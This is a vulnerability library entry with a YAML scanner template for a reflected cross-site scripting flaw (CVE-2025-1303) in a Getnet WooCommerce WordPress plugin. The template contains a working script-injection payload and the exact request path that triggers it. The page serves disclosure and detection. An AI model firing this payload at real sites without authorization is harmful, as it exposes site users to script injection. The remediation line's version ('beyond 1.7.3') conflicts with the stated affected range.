/Vulnerability Library

Plugin Oficial – Getnet para WooCommerce <= 1.8.0 - Cross-Site Scripting

CVE-2025-1303
Verified

Description

The Plugin Oficial – Getnet para WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on the 'page' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

Severity

Medium

Published Date

February 9, 2026

Template Author

shivam kamboj

CVE-2025-1303.yaml
id: CVE-2025-1303

info:
  name: Plugin Oficial – Getnet para WooCommerce <= 1.8.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    The Plugin Oficial – Getnet para WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on the 'page' parameter. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
  impact: |
    Unauthenticated attackers can execute scripts in users' browsers, potentially stealing data or performing actions on their behalf.
  remediation: |
    Update to the latest version beyond 1.7.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1303
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wordpress,wp,wp-plugin,wc-checkout-getnet,xss,reflected,unauth

variables:
  payload: '"></script><script>alert(document.domain)</script><script>'

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-checkout-getnet/views/partials/settings/privacy-policy.php?page=1{{payload}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(body, "activepost") && contains(body, "gnt-modal-controls")'
        condition: and
# digest: 490a0046304402203354b6b3615aeead1878eb2c4cee0f9f496a1ab81c56250309e737f98dee7c1102205feb0f55d334c21b72fc7b4599fe03d3d3e17df0dfc9c9ae401592199d374322:922c64590222798bb761d5b6d8e72950
5.0Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2025-1303

Remediation Steps

Update to the latest version beyond 1.7.3.